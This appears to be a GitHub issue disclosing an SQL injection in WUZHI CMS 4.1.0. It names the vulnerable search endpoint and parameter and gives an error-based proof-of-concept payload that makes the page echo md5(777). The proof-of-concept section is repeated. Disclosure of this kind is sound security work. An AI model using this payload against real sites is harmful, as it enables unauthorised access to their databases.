You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
a sql injection was discovered in WUZHI CMS 4.1.0 .There is a sql injection vulnerability which allows remote attackers to Injecting a malicious SQL statement into a server via the index.php?m=promote&f=index&v=search&_su=wuzhicms&fieldtype=place&keywords={sql payload}
POC
code that has loopholes
SQL statement error prompt MySQL database
after payload injection **jiguang'and+extractvalue(1,concat(0x7e,md5(777)))%23** the page shows the value of md5(777)
The text was updated successfully, but these errors were encountered:
POC
code that has loopholes
SQL statement error prompt MySQL database
after payload injection **jiguang'and+extractvalue(1,concat(0x7e,md5(777)))%23** the page shows the value of md5(777)
The text was updated successfully, but these errors were encountered: